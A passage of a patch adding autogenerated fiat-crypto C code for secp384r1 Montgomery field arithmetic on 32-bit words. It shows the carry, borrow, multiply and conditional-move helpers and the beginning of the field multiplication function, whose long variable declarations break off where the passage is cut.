Autogenerated: word_by_word_montgomery --static secp384r1 32 '2^384 - 2^128 - 2^96 + 2^32 - 1' */ ++/* curve description: secp384r1 */ ++/* machine_wordsize = 32 (from "32") */ ++/* requested operations: (all) */ ++/* m = 0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffeffffffff0000000000000000ffffffff (from "2^384 - 2^128 - 2^96 + 2^32 - 1") */ ++/* */ ++/* NOTE: In addition to the bounds specified above each function, all */ ++/* functions synthesized for this Montgomery arithmetic require the */ ++/* input to be strictly less than the prime modulus (m), and also */ ++/* require the input to be in the unique saturated representation. */ ++/* All functions also ensure that these two properties are true of */ ++/* return values. */ ++/* */ ++/* Computed values: */ ++/* eval z = z[0] + (z[1] << 32) + (z[2] << 64) + (z[3] << 96) + (z[4] << 128) + (z[5] << 160) + (z[6] << 192) + (z[7] << 224) + (z[8] << 256) + (z[9] << 0x120) + (z[10] << 0x140) + (z[11] << 0x160) */ ++/* bytes_eval z = z[0] + (z[1] << 8) + (z[2] << 16) + (z[3] << 24) + (z[4] << 32) + (z[5] << 40) + (z[6] << 48) + (z[7] << 56) + (z[8] << 64) + (z[9] << 72) + (z[10] << 80) + (z[11] << 88) + (z[12] << 96) + (z[13] << 104) + (z[14] << 112) + (z[15] << 120) + (z[16] << 128) + (z[17] << 136) + (z[18] << 144) + (z[19] << 152) + (z[20] << 160) + (z[21] << 168) + (z[22] << 176) + (z[23] << 184) + (z[24] << 192) + (z[25] << 200) + (z[26] << 208) + (z[27] << 216) + (z[28] << 224) + (z[29] << 232) + (z[30] << 240) + (z[31] << 248) + (z[32] << 256) + (z[33] << 0x108) + (z[34] << 0x110) + (z[35] << 0x118) + (z[36] << 0x120) + (z[37] << 0x128) + (z[38] << 0x130) + (z[39] << 0x138) + (z[40] << 0x140) + (z[41] << 0x148) + (z[42] << 0x150) + (z[43] << 0x158) + (z[44] << 0x160) + (z[45] << 0x168) + (z[46] << 0x170) + (z[47] << 0x178) */ ++ ++#include ++typedef unsigned char fiat_secp384r1_uint1; ++typedef signed char fiat_secp384r1_int1; ++ ++#if (-1 & 3) != 3 ++#error "This code only works on a two's complement system" ++#endif ++ ++/* ++ * The function fiat_secp384r1_addcarryx_u32 is an addition with carry. ++ * Postconditions: ++ * out1 = (arg1 + arg2 + arg3) mod 2^32 ++ * out2 = ⌊(arg1 + arg2 + arg3) / 2^32⌋ ++ * ++ * Input Bounds: ++ * arg1: [0x0 ~> 0x1] ++ * arg2: [0x0 ~> 0xffffffff] ++ * arg3: [0x0 ~> 0xffffffff] ++ * Output Bounds: ++ * out1: [0x0 ~> 0xffffffff] ++ * out2: [0x0 ~> 0x1] ++ */ ++static void ++fiat_secp384r1_addcarryx_u32(uint32_t *out1, ++ fiat_secp384r1_uint1 *out2, ++ fiat_secp384r1_uint1 arg1, ++ uint32_t arg2, uint32_t arg3) ++{ ++ uint64_t x1; ++ uint32_t x2; ++ fiat_secp384r1_uint1 x3; ++ x1 = ((arg1 + (uint64_t)arg2) + arg3); ++ x2 = (uint32_t)(x1 & UINT32_C(0xffffffff)); ++ x3 = (fiat_secp384r1_uint1)(x1 >> 32); ++ *out1 = x2; ++ *out2 = x3; ++} ++ ++/* ++ * The function fiat_secp384r1_subborrowx_u32 is a subtraction with borrow. ++ * Postconditions: ++ * out1 = (-arg1 + arg2 + -arg3) mod 2^32 ++ * out2 = -⌊(-arg1 + arg2 + -arg3) / 2^32⌋ ++ * ++ * Input Bounds: ++ * arg1: [0x0 ~> 0x1] ++ * arg2: [0x0 ~> 0xffffffff] ++ * arg3: [0x0 ~> 0xffffffff] ++ * Output Bounds: ++ * out1: [0x0 ~> 0xffffffff] ++ * out2: [0x0 ~> 0x1] ++ */ ++static void ++fiat_secp384r1_subborrowx_u32(uint32_t *out1, ++ fiat_secp384r1_uint1 *out2, ++ fiat_secp384r1_uint1 arg1, ++ uint32_t arg2, uint32_t arg3) ++{ ++ int64_t x1; ++ fiat_secp384r1_int1 x2; ++ uint32_t x3; ++ x1 = ((arg2 - (int64_t)arg1) - arg3); ++ x2 = (fiat_secp384r1_int1)(x1 >> 32); ++ x3 = (uint32_t)(x1 & UINT32_C(0xffffffff)); ++ *out1 = x3; ++ *out2 = (fiat_secp384r1_uint1)(0x0 - x2); ++} ++ ++/* ++ * The function fiat_secp384r1_mulx_u32 is a multiplication, returning the full double-width result. ++ * Postconditions: ++ * out1 = (arg1 * arg2) mod 2^32 ++ * out2 = ⌊arg1 * arg2 / 2^32⌋ ++ * ++ * Input Bounds: ++ * arg1: [0x0 ~> 0xffffffff] ++ * arg2: [0x0 ~> 0xffffffff] ++ * Output Bounds: ++ * out1: [0x0 ~> 0xffffffff] ++ * out2: [0x0 ~> 0xffffffff] ++ */ ++static void ++fiat_secp384r1_mulx_u32(uint32_t *out1, uint32_t *out2, ++ uint32_t arg1, uint32_t arg2) ++{ ++ uint64_t x1; ++ uint32_t x2; ++ uint32_t x3; ++ x1 = ((uint64_t)arg1 * arg2); ++ x2 = (uint32_t)(x1 & UINT32_C(0xffffffff)); ++ x3 = (uint32_t)(x1 >> 32); ++ *out1 = x2; ++ *out2 = x3; ++} ++ ++/* ++ * The function fiat_secp384r1_cmovznz_u32 is a single-word conditional move. ++ * Postconditions: ++ * out1 = (if arg1 = 0 then arg2 else arg3) ++ * ++ * Input Bounds: ++ * arg1: [0x0 ~> 0x1] ++ * arg2: [0x0 ~> 0xffffffff] ++ * arg3: [0x0 ~> 0xffffffff] ++ * Output Bounds: ++ * out1: [0x0 ~> 0xffffffff] ++ */ ++static void ++fiat_secp384r1_cmovznz_u32(uint32_t *out1, ++ fiat_secp384r1_uint1 arg1, uint32_t arg2, ++ uint32_t arg3) ++{ ++ fiat_secp384r1_uint1 x1; ++ uint32_t x2; ++ uint32_t x3; ++ x1 = (!(!arg1)); ++ x2 = ((fiat_secp384r1_int1)(0x0 - x1) & UINT32_C(0xffffffff)); ++ x3 = ((x2 & arg3) | ((~x2) & arg2)); ++ *out1 = x3; ++} ++ ++/* ++ * The function fiat_secp384r1_mul multiplies two field elements in the Montgomery domain. ++ * Preconditions: ++ * 0 ≤ eval arg1 < m ++ * 0 ≤ eval arg2 < m ++ * Postconditions: ++ * eval (from_montgomery out1) mod m = (eval (from_montgomery arg1) * eval (from_montgomery arg2)) mod m ++ * 0 ≤ eval out1 < m ++ * ++ * Input Bounds: ++ * arg1: [[0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff]] ++ * arg2: [[0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff]] ++ * Output Bounds: ++ * out1: [[0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff], [0x0 ~> 0xffffffff]] ++ */ ++static void ++fiat_secp384r1_mul(uint32_t out1[12], const uint32_t arg1[12], ++ const uint32_t arg2[12]) ++{ ++ uint32_t x1; ++ uint32_t x2; ++ uint32_t x3; ++ uint32_t x4; ++ uint32_t x5; ++ uint32_t x6; ++ uint32_t x7; ++ uint32_t x8; ++ uint32_t x9; ++ uint32_t x10; ++ uint32_t x11; ++ uint32_t x12; ++ uint32_t x13; ++ uint32_t x14; ++ uint32_t x15; ++ uint32_t x16; ++ uint32_t x17; ++ uint32_t x18; ++ uint32_t x19; ++ uint32_t x20; ++ uint32_t x21; ++ uint32_t x22; ++ uint32_t x23; ++ uint32_t x24; ++ uint32_t x25; ++ uint32_t x26; ++ uint32_t x27; ++ uint32_t x28; ++ uint32_t x29; ++ uint32_t x30; ++ uint32_t x31; ++ uint32_t x32; ++ uint32_t x33; ++ uint32_t x34; ++ uint32_t x35; ++ uint32_t x36; ++ uint32_t x37; ++ fiat_secp384r1_uint1 x38; ++ uint32_t x39; ++ fiat_secp384r1_uint1 x40; ++ uint32_t x41; ++ fiat_secp384r1_uint1 x42; ++ uint32_t x43; ++ fiat_secp384r1_uint1 x44; ++ uint32_t x45; ++ fiat_secp384r1_uint1 x46; ++ uint32_t x47; ++ fiat_secp384r1_uint1 x48; ++ uint32_t x49; ++ fiat_secp384r1_uint1 x50; ++ uint32_t x51; ++ fiat_secp384r1_uint1 x52; ++ uint32_t x53; ++ fiat_secp384r1_uint1 x54; ++ uint32_t x55; ++ fiat_secp384r1_uint1 x56; ++ uint32_t x57; ++ fiat_secp384r1_uint1 x58; ++ uint32_t x59; ++ uint32_t x60; ++ uint32_t x61; ++ uint32_t x62; ++ uint32_t x63; ++ uint32_t x64; ++ uint32_t x65; ++ uint32_t x66; ++ uint32_t x67; ++ uint32_t x68; ++ uint32_t x69; ++ uint32_t x70; ++ uint32_t x71; ++ uint32_t x72; ++ uint32_t x73; ++ uint32_t x74; ++ uint32_t x75; ++ uint32_t x76; ++ uint32_t x77; ++ uint32_t x78; ++ uint32_t x79; ++ uint32_t x80; ++ fiat_secp384r1_uint1 x81; ++ uint32_t x82; ++ fiat_secp384r1_uint1 x83; ++ uint32_t x84; ++ fiat_secp384r1_uint1 x85; ++ uint32_t x86; ++ fiat_secp384r1_uint1 x87; ++ uint32_t x88; ++ fiat_secp384r1_uint1 x89; ++ uint32_t x90; ++ fiat_secp384r1_uint1 x91; ++ uint32_t x92; ++ fiat_secp384r1_uint1 x93; ++ uint32_t x94; ++ fiat_secp384r1_uint1 x95; ++ uint32_t x96; ++ uint32_t x97; ++ fiat_secp384r1_uint1 x98; ++ uint32_t x99; ++ fiat_secp384r1_uint1 x100; ++ uint32_t x101; ++ fiat_secp384r1_uint1 x102; ++ uint32_t x103; ++ fiat_secp384r1_uint1 x104; ++ uint32_t x105; ++ fiat_secp384r1_uint1 x106; ++ uint32_t x107; ++ fiat_secp384r1_uint1 x108; ++ uint32_t x109; ++ fiat_secp384r1_uint1 x110; ++ uint32_t x111; ++ fiat_secp384r1_uint1 x112; ++ uint32_t x113; ++ fiat_secp384r1_uint1 x114; ++ uint32_t x115; ++ fiat_secp384r1_uint1 x116; ++ uint32_t x117; ++ fiat_secp384r1_uint1 x118; ++ uint32_t x119; ++ fiat_secp384r1_uint1 x120; ++ uint32_t x121; ++ fiat_secp384r1_uint1 x122; ++ uint32_t x123; ++ uint32_t x124; ++ uint32_t x125; ++ uint32_t x126; ++ uint32_t x127; ++ uint32_t x128; ++ uint32_t x129; ++ uint32_t x130; ++ uint32_t x131; ++ uint32_t x132; ++ uint32_t x133; ++ uint32_t x134; ++ uint32_t x135; ++ uint32_t x136; ++ uint32_t x137; ++ uint32_t x138; ++ uint32_t x139; ++ uint32_t x140; ++ uint32_t x141; ++ uint32_t x142; ++ uint32_t x143; ++ uint32_t x144; ++ uint32_t x145; ++ uint32_t x146; ++ uint32_t x147; ++ fiat_secp384r1_uint1 x148; ++ uint32_t x149; ++ fiat_secp384r1_uint1 x150; ++ uint32_t x151; ++ fiat_secp384r1_uint1 x152; ++ uint32_t x153; ++ fiat_secp384r1_uint1 x154; ++ uint32_t x155; ++ fiat_secp384r1_uint1 x156; ++ uint32_t x157; ++ fiat_secp384r1_uint1 x158; ++ uint32_t x159; ++ fiat_secp384r1_uint1 x160; ++ uint32_t x161; ++ fiat_secp384r1_uint1 x162; ++ uint32_t x163; ++ fiat_secp384r1_uint1 x164; ++ uint32_t x165; ++ fiat_secp384r1_uint1 x166; ++ uint32_t x167; ++ fiat_secp384r1_uint1 x168; ++ uint32_t x169; ++ uint32_t x170; ++ fiat_secp384r1_uint1 x171; ++ uint32_t x172; ++ fiat_secp384r1_uint1 x173; ++ uint32_t x174; ++ fiat_secp384r1_uint1 x175; ++ uint32_t x176; ++ fiat_secp384r1_uint1 x177; ++ uint32_t x178; ++ fiat_secp384r1_uint1 x179; ++ uint32_t x180; ++ fiat_secp384r1_uint1 x181; ++ uint32_t x182; ++ fiat_secp384r1_uint1 x183; ++ uint32_t x184; ++ fiat_secp384r1_uint1 x185; ++ uint32_t x186; ++ fiat_secp384r1_uint1 x187; ++ uint32_t x188; ++ fiat_secp384r1_uint1 x189; ++ uint32_t x190; ++ fiat_secp384r1_uint1 x191; ++ uint32_t x192; ++ fiat_secp384r1_uint1 x193; ++ uint32_t x194; ++ fiat_secp384r1_uint1 x195; ++ uint32_t x196; ++ uint32_t x197; ++ uint32_t x198; ++ uint32_t x199; ++ uint32_t x200; ++ uint32_t x201; ++ uint32_t x202; ++ uint32_t x203; ++ uint32_t x204; ++ uint32_t x205; ++ uint32_t x206; ++ uint32_t x207; ++ uint32_t x208; ++ uint32_t x209; ++ uint32_t x210; ++ uint32_t x211; ++ uint32_t x212; ++ uint32_t x213; ++ uint32_t x214; ++ uint32_t x215; ++ uint32_t x216; ++ fiat_secp384r1_uint1 x217; ++ uint32_t x218; ++ fiat_secp384r1_uint1 x219; ++ uint32_t x220; ++ fiat_secp384r1_uint1 x221; ++ uint32_t x222; ++ fiat_secp384r1_uint1 x223; ++ uint32_t x224; ++ fiat_secp384r1_uint1 x225; ++ uint32_t x226; ++ fiat_secp384r1_uint1 x227; ++ uint32_t x228; ++ fiat_secp384r1_uint1 x229; ++ uint32_t x230; ++ fiat_secp384r1_uint1 x231; ++ uint32_t x232; ++ uint32_t x233; ++ fiat_secp384r1_uint1 x234; ++ uint32_t x235; ++ fiat_secp384r1_uint1 x236; ++ uint32_t x237; ++ fiat_secp384r1_uint1 x238; ++ uint32_t x239; ++ fiat_secp384r1_uint1 x240; ++ uint32_t x241; ++ fiat_secp384r1_uint1 x242; ++ uint32_t x243; ++ fiat_secp384r1_uint1 x244; ++ uint32_t x245; ++ fiat_secp384r1_uint1 x246; ++ uint32_t x247; ++ fiat_secp384r1_uint1 x248; ++ uint32_t x249; ++ fiat_secp384r1_uint1 x250; ++ uint32_t x251; ++ fiat_secp384r1_uint1 x252; ++ uint32_t x253; ++ fiat_secp384r1_uint1 x254; ++ uint32_t x255; ++ fiat_secp384r1_uint1 x256; ++ uint32_t x257; ++ fiat_secp384r1_uint1 x258; ++ uint32_t x259; ++ uint32_t x260; ++ uint32_t x261; ++ uint32_t x262; ++ uint32_t x263; ++ uint32_t x264; ++ uint32_t x265; ++ uint32_t x266; ++ uint32_t x267; ++ uint32_t x268; ++ uint32_t x269; ++ uint32_t x270; ++ uint32_t x271; ++ uint32_t x272; ++ uint32_t x273; ++ uint32_t x274; ++ uint32_t x275; ++ uint32_t x276; ++ uint32_t x277; ++ uint32_t x278; ++ uint32_t x279; ++ uint32_t x280; ++ uint32_t x281; ++ uint32_t x282; ++ uint32_t x283; ++ uint32_t x284; ++ fiat_secp384r1_uint1 x285; ++ uint32_t x286; ++ fiat_secp384r1_uint1 x287; ++ uint32_t x288; ++ fiat_secp384r1_uint1 x289; ++ uint32_t x290; ++ fiat_secp384r1_uint1 x291; ++ uint32_t x292; ++ fiat_secp384r1_uint1 x293; ++ uint32_t x294; ++ fiat_secp384r1_uint1 x295; ++ uint32_t x296; ++ fiat_secp384r1_uint1 x297; ++ uint32_t x298; ++ fiat_secp384r1_uint1 x299; ++ uint32_t x300; ++ fiat_secp384r1_uint1 x301; ++ uint32_t x302; ++ fiat_secp384r1_uint1 x303; ++ uint32_t x304; ++ fiat_secp384r1_uint1 x305; ++ uint32_t x306; ++ uint32_t x307; ++ fiat_secp384r1_uint1 x308; ++ uint32_t x309; ++ fiat_secp384r1_uint1 x310; ++ uint32_t x311; ++ fiat_secp384r1_uint1 x312; ++ uint32_t x313; ++ fiat_secp384r1_uint1 x314; ++ uint32_t x315; ++ fiat_secp384r1_uint1 x316; ++ uint32_t x317; ++ fiat_secp384r1_uint1 x318; ++ uint32_t x319; ++ fiat_secp384r1_uint1 x320; ++ uint32_t x321; ++ fiat_secp384r1_uint1 x322; ++ uint32_t x323; ++ fiat_secp384r1_uint1 x324; ++ uint32_t x325; ++ fiat_secp384r1_uint1 x326; ++ uint32_t x327; ++ fiat_secp384r1_uint1 x328; ++ uint32_t x329; ++ fiat_secp384r1_uint1 x330; ++ uint32_t x331; ++ fiat_secp384r1_uint1 x332; ++ uint32_t x333; ++ uint32_t x334; ++ uint32_t x335; ++ uint32_t x336; ++ uint32_t x337; ++ uint32_t x338; ++ uint32_t x339; ++ uint32_t x340; ++ uint32_t x341; ++ uint32_t x342; ++ uint32_t x343; ++ uint32_t x344; ++ uint32_t x345; ++ uint32_t x346; ++ uint32_t x347; ++ uint32_t x348; ++ uint32_t x349; ++ uint32_t x350; ++ uint32_t x351; ++ uint32_t x352; ++ uint32_t x353; ++ fiat_secp384r1_uint1 x354; ++ uint32_t x355; ++ fiat_secp384r1_uint1 x356; ++ uint32_t x357; ++ fiat_secp384r1_uint1 x358; ++ uint32_t x359; ++ fiat_secp384r1_uint1 x360; ++ uint32_t x361; ++ fiat_secp384r1_uint1 x362; ++ uint32_t x363; ++ fiat_secp384r1_uint1 x364; ++ uint32_t x365; ++ fiat_secp384r1_uint1 x366; ++ uint32_t x367; ++ fiat_secp384r1_uint1 x368; ++ uint32_t x369; ++ uint32_t x370; ++ fiat_secp384r1_uint1 x371; ++ uint32_t x372; ++ fiat_secp384r1_uint1 x373; ++ uint32_t x374; ++ fiat_secp384r1_uint1 x375; ++ uint32_t x376; ++ fiat_secp384r1_uint1 x377; ++ uint32_t x378; ++ fiat_secp384r1_uint1 x379; ++ uint32_t x380; ++ fiat_secp384r1_uint1 x381; ++ uint32_t x382; ++ fiat_secp384r1_uint1 x383; ++ uint32_t x384; ++ fiat_secp384r1_uint1 x385; ++ uint32_t x386; ++ fiat_secp384r1_uint1 x387; ++ uint32_t x388; ++ fiat_secp384r1_uint1 x389; ++ uint32_t x390; ++ fiat_secp384r1_uint1 x391; ++ uint32_t x392; ++ fiat_secp384r1_uint1 x393; ++ uint32_t x394; ++ fiat_secp384r1_uint1 x395; ++ uint32_t x396; ++ uint32_t x397; ++ uint32_t x398; ++ uint32_t x399; ++ uint32_t x400; ++ uint32_t x401; ++ uint32_t x402; ++ uint32_t x403; ++ uint32_t x404; ++ uint32_t x405; ++ uint32_t x406; ++ uint32_t x407; ++ uint32_t x408; ++ uint32_t x409; ++ uint32_t x410; ++ uint32_t x411; ++ uint32_t x412; ++ uint32_t x413; ++ uint32_t x414; ++ uint32_t x415; ++ uint32_t x416; ++ uint32_t x417; ++ uint32_t x418; ++ uint32_t x419; ++ uint32_t x420; ++ uint32_t x421; ++ fiat_secp384r1_uint1 x422; ++ uint32_t x423; ++ fiat_secp384r1_uint1 x424; ++ uint32_t x425; ++ fiat_secp384r1_uint1 x426; ++ uint32_t x427; ++ fiat_secp384r1_uint1 x428; ++ uint32_t x429; ++ fiat_secp384r1_uint1 x430; ++ uint32_t x431; ++ fiat_secp384r1_uint1 x432; ++ uint32_t x433; ++ fiat_secp384r1_uint1 x434; ++ uint32_t x435; ++ fiat_secp384r1_uint1 x436; ++ uint32_t x437; ++ fiat_secp384r1_uint1 x438; ++ uint32_t x439; ++ fiat_secp384r1_uint1 x440; ++ uint32_t x441; ++ fiat_secp384r1_uint1 x442; ++ uint32_t x443; ++ uint32_t x444; ++ fiat_secp384r1_uint1 x445; ++ uint32_t x446; ++ fiat_secp384r1_uint1 x447; ++ uint32_t x448; ++ fiat_secp384r1_uint1 x449; ++ uint32_t x450; ++ fiat_secp384r1_uint1 x451; ++ uint32_t x452; ++ fiat_secp384r1_uint1 x453; ++ uint32_t x454; ++ fiat_secp384r1_uint1 x455; ++ uint32_t x456; ++ fiat_secp384r1_uint1 x457; ++ uint32_t x458; ++ fiat_secp384r1_uint1 x459; ++ uint32_t x460; ++ fiat_secp384r1_uint1 x461; ++ uint32_t x462; ++ fiat_secp384r1_uint1 x463; ++ uint32_t x464; ++ fiat_secp384r1_uint1 x465; ++ uint32_t x466; ++ fiat_secp384r1_uint1 x467; ++ uint32_t x468; ++ fiat_secp384r1_uint1 x469; ++ uint32_t x470; ++ uint32_t x471; ++ uint32_t x472; ++ uint32_t x473; ++ uint32_t x474; ++ uint32_t x475; ++ uint32_t x476; ++ uint32_t x477; ++ uint32_t x478; ++ uint32_t x479; ++ uint32_t x480; ++ uint32_t x481; ++ uint32_t x482; ++ uint32_t x483; ++ uint32_t x484; ++ uint32_t x485; ++ uint32_t x486; ++ uint32_t x487; ++ uint32_t x488; ++ uint32_t x489; ++ uint32_t x490; ++ fiat_secp384r1_uint1 x491; ++ uint32_t x492; ++ fiat_secp384r1_uint1 x493; ++ uint32_t x494; ++ fiat_secp384r1_uint1 x495; ++ uint32_t x496; ++ fiat_secp384r1_uint1 x497; ++ uint32_t x498; ++ fiat_secp384r1_uint1 x499; ++ uint32_t x500; ++ fiat_secp384r1_uint1 x501; ++ uint32_t x502; ++ fiat_secp384r1_uint1 x503; ++ uint32_t x504; ++ fiat_secp384r1_uint1 x505; ++ uint32_t x506; ++ uint32_t x507; ++ fiat_secp384r1_uint1 x508; ++ uint32_t x509; ++ fiat_secp384r1_uint1 x510; ++ uint32_t x511; ++ fiat_secp384r1_uint1 x512; ++ uint32_t x513; ++ fiat_secp384r1_uint1 x514; ++ uint32_t x515; ++ fiat_secp384r1_uint1 x516; ++ uint32_t x517; ++ fiat_secp384r1_uint1 x518; ++ uint32_t x519; ++ fiat_secp384r1_uint1 x520; ++ uint32_t x521; ++ fiat_secp384r1_uint1 x522; ++ uint32_t x523; ++ fiat_secp384r1_uint1 x524; ++ uint32_t x525; ++ fiat_secp384r1_uint1 x526; ++ uint32_t x527; ++ fiat_secp384r1_uint1 x528; ++ uint32_t x529; ++ fiat_secp384r1_uint1 x530; ++ uint32_t x531; ++ fiat_secp384r1_uint1 x532; ++ uint32_t x533; ++ uint32_t x534; ++ uint32_t x535; ++ uint32_t x536; ++ uint32_t x537; ++ uint32_t x538; ++ uint32_t x539; ++ uint32_t x540; ++ uint32_t x541; ++ uint32_t x542; ++ uint32_t x543; ++ uint32_t x544; ++ uint32_t x545; ++ uint32_t x546; ++ uint32_t x547; ++ uint32_t x548; ++ uint32_t x549; ++ uint32_t x550; ++ uint32_t x551; ++ uint32_t x552; ++ uint32_t x553; ++ uint32_t x554; ++ uint32_t x555; ++ uint32_t x556; ++ uint32_t x557; ++ uint32_t x558; ++ fiat_secp384r1_uint1 x559; ++ uint32_t x560; ++ fiat_secp384r1_uint1 x561; ++ uint32_t x562; ++ fiat_secp384r1_uint1 x563; ++ uint32_t x564; ++ fiat_secp384r1_uint1 x565; ++ uint32_t x566; ++ fiat_secp384r1_uint1 x567; ++ uint32_t x568; ++ fiat_secp384r1_uint1 x569; ++ uint32_t x570; ++ fiat_secp384r1_uint1 x571; ++ uint32_t x572; ++ fiat_secp384r1_uint1 x573; ++ uint32_t x574; ++ fiat_secp384r1_uint1 x575; ++ uint32_t x576; ++ fiat_secp384r1_uint1 x577; ++ uint32_t x578; ++ fiat_secp384r1_uint1 x579; ++ uint32_t x580; ++ uint32_t x581; ++ fiat_secp384r1_uint1 x582; ++ uint32_t x583; ++ fiat_secp384r1_uint1 x584; ++ uint32_t x585; ++ fiat_secp384r1_uint1 x586; ++ uint32_t x587; ++ fiat_secp384r1_uint1 x588; ++ uint32_t x589; ++ fiat_secp384r1_uint1 x590; ++ uint32_t x591; ++ fiat_secp384r1_uint1 x592; ++ uint32_t x593; ++ fiat_secp384r1_uint1 x594; ++ uint32_t x595; ++ fiat_secp384r1_uint1 x596; ++ uint32_t x597; ++ fiat_secp384r1_uint1 x598; ++ uint32_t x599; ++ fiat_secp384r1_uint1 x600; ++ uint32_t x601; ++ fiat_secp384r1_uint1 x602; ++ uint32_t x603; ++ fiat_secp384r1_uint1 x604; ++ uint32_t x605; ++ fiat_secp384r1_uint1 x606; ++ uint32_t x607; ++ uint32_t x608; ++ uint32_t x609; ++ uint32_t x610; ++ uint32_t x611; ++ uint32_t x612; ++ uint32_t x613; ++ uint32_t x614; ++ uint32_t x615; ++ uint32_t x616; ++ uint32_t x617; ++ uint32_t x618; ++ uint32_t x619; ++ uint32_t x620; ++ uint32_t x621; ++ uint32_t x622; ++ uint32_t x623; ++ uint32_t x624; ++ uint32_t x625; ++ uint32_t x626; ++ uint32_t x627; ++ fiat_secp384r1_uint1 x628; ++ uint32_t x629; ++ fiat_secp384r1_uint1 x630; ++ uint32_t x631; ++ fiat_secp384r1_uint1 x632; ++ uint32_t x633; ++ fiat_secp384r1_uint1 x634; ++ uint32_t x635; ++ fiat_secp384r1_uint1 x636; ++ uint32_t x637; ++ fiat_secp384r1_uint1 x638; ++ uint32_t x639; ++ fiat_secp384r1_uint1 x640; ++ uint32_t x641; ++ fiat_secp384r1_uint1 x642; ++ uint32_t x643; ++ uint32_t x644; ++ fiat_secp384r1_uint1 x645; ++ uint32_t x646; ++ fiat_secp384r1_uint1 x647; ++ uint32_t x648; ++ fiat_secp384r1_uint1 x649; ++ uint32_t x650; ++ fiat_secp384r1_uint1 x651; ++ uint32_t x652; ++ fiat_secp384r1_uint1 x653; ++ uint32_t x654; ++ fiat_secp384r1_uint1 x655; ++ uint32_t x656; ++ fiat_secp384r1_uint1 x657; ++ uint32_t x658; ++ fiat_secp384r1_uint1 x659; ++ uint32_t x660; ++ fiat_secp384r1_uint1 x661; ++ uint32_t x662; ++ fiat_secp384r1_uint1 x663; ++ uint32_t x664; ++ fiat_secp384r1_uint1 x665; ++ uint32_t x666; ++ fiat_secp384r1_uint1 x667; ++ uint32_t x668; ++ fiat_secp384r1_uint1 x669; ++ uint32_t x670; ++ uint32_t x671; ++ uint32_t x672; ++ uint32_t x673; ++ uint32_t x674; ++ uint32_t x675; ++ uint32_t x676; ++ uint32_t x677; ++ uint32_t x678; ++ uint32_t x679; ++ uint32_t x680; ++ uint32_t x681; ++ uint32_t x682; ++ uint32_t x683; ++ uint32_t x684; ++ uint32_t x685; ++ uint32_t x686; ++ uint32_t x687; ++ uint32_t x688; ++ uint32_t x689; ++ uint32_t x690; ++ uint32_t x691; ++ uint32_t x692; ++ uint32_t x693; ++ uint32_t x694; ++ uint32_t x695; ++ fiat_secp384r1_uint1 x696; ++ uint32_t x697; ++ fiat_secp384r1_uint1 x698; ++ uint32_t x699; ++ fiat_secp384r1_uint1 x700; ++ uint32_t x701; ++ fiat_secp384r1_uint1 x702; ++ uint32_t x703; ++ fiat_secp384r1_uint1 x704; ++ uint32_t x705; ++ fiat_secp384r1_uint1 x706; ++ uint32_t x707; ++ fiat_secp384r1_uint1 x708; ++ uint32_t x709; ++ fiat_secp384r1_uint1 x710; ++ uint32_t x711; ++ fiat_secp384r1_uint1 x712; ++ uint32_t x713; ++ fiat_secp384r1_uint1 x714; ++ uint32_t x715; ++ fiat_secp384r1_uint1 x716; ++ uint32_t x717; ++ uint32_t x718; ++ fiat_secp384r1_uint1 x719; ++ uint32_t x720; ++ fiat_secp384r1_uint1 x721; ++ uint32_t x722; ++ fiat_secp384r1_uint1 x723; ++ uint32_t x724; ++ fiat_secp384r1_uint1 x725; ++ uint32_t x726; ++ fiat_secp384r1_uint1 x727; ++ uint32_t x728; ++ fiat_secp384r1_uint1 x729; ++ uint32_t x730; ++ fiat_secp384r1_uint1 x731; ++ uint32_t x732; ++ fiat_secp384r1_uint1 x733; ++ uint32_t x734; ++ fiat_secp384r1_uint1 x735; ++ uint32_t x736; ++ fiat_secp384r1_uint1 x737; ++ uint32_t x738; ++ fiat_secp384r1_uint1 x739; ++ uint32_t x740; ++ fiat_secp384r1_uint1 x741; ++ uint32_t x742; ++ fiat_secp384r1_uint1 x743; ++ uint32_t x744; ++ uint32_t x745; ++ uint32_t x746; ++ uint32_t x747; ++ uint32_t x748; ++ uint32_t x749; ++ uint32_t x750; ++ uint32_t x751; ++ uint32_t x752; ++ uint32_t x753; ++ uint32_t x754; ++ uint32_t x755; ++ uint32_t x756; ++ uint32_t x757; ++ uint32_t x758; ++ uint32_t x759; ++ uint32_t x760; ++ uint32_t x761; ++ uint32_t x762; ++ uint32_t x763; ++ uint32_t x764; ++ fiat_secp384r1_uint1 x765; ++ uint32_t x766; ++ fiat_secp384r1_uint1 x767; ++ uint32_t x768; ++ fiat_secp384r1_uint1 x769; ++ uint32_t x770; ++ fiat_secp384r1_uint1 x771; ++ uint32_t x772; ++ fiat_secp384r1_uint1 x773; ++ uint32_t x774; ++ fiat_secp384r1_uint1 x775; ++ uint32_t x776; ++ fiat_secp384r1_uint1 x777; ++ uint32_t x778; ++ fiat_secp384r1_uint1 x779; ++ uint32_t x780; ++ uint32_t x781; ++ fiat_secp384r1_uint1 x782; ++ uint32_t x783; ++ fiat_secp384r1_uint1 x784; ++ uint32_t x785; ++ fiat_secp384r1_uint1 x786; ++ uint32_t x787; ++ fiat_secp384r1_uint1 x788; ++ uint32_t x789; ++ fiat_secp384r1_uint1 x790; ++ uint32_t x791; ++ fiat_secp384r1_uint1 x792; ++ uint32_t x793; ++ fiat_secp384r1_uint1 x794; ++ uint32_t x795; ++ fiat_secp384r1_uint1 x796; ++ uint32_t x797; ++ fiat_secp384r1_uint1 x798; ++ uint32_t x799; ++ fiat_secp384r1_uint1 x800; ++ uint32_t x801; ++ 